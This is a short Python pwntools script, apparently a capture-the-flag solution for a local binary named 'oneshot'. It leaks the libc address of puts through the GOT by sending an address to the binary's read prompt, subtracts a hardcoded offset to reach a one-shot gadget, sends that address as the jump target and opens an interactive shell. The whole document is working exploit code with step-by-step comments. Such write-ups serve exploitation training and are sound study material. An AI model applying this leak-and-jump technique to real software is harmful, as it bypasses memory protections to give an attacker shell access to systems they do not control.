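from pwn import *

r = process("./oneshot")
elf = ELF("./oneshot")

# GOT slot of puts: after puts has been called once it holds the resolved libc address
puts_got = elf.got['puts']

# First prompt: the binary reads an address (sent in decimal) and prints the value stored there
r.recv()
payload = str(puts_got).encode()
r.sendline(payload)

# The leak comes back as a hex string after "Value: ", terminated by a newline
r.recvuntil(b"Value: ")
libc_puts = r.recvuntil(b"\x0a", drop=True)
libc_puts = int(libc_puts, 16)
# 0x2a47a is the distance from puts to the one-shot gadget; it depends on the libc build in use
oneshot = libc_puts - 0x2a47a
log.info("libc_puts = {}".format(hex(libc_puts)))
log.info("oneshot = {}".format(hex(oneshot)))

# Second prompt: the binary jumps to the address we send (again in decimal)
r.recvuntil(b"Jump location?")
r.sendline(str(oneshot).encode())

r.interactive()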
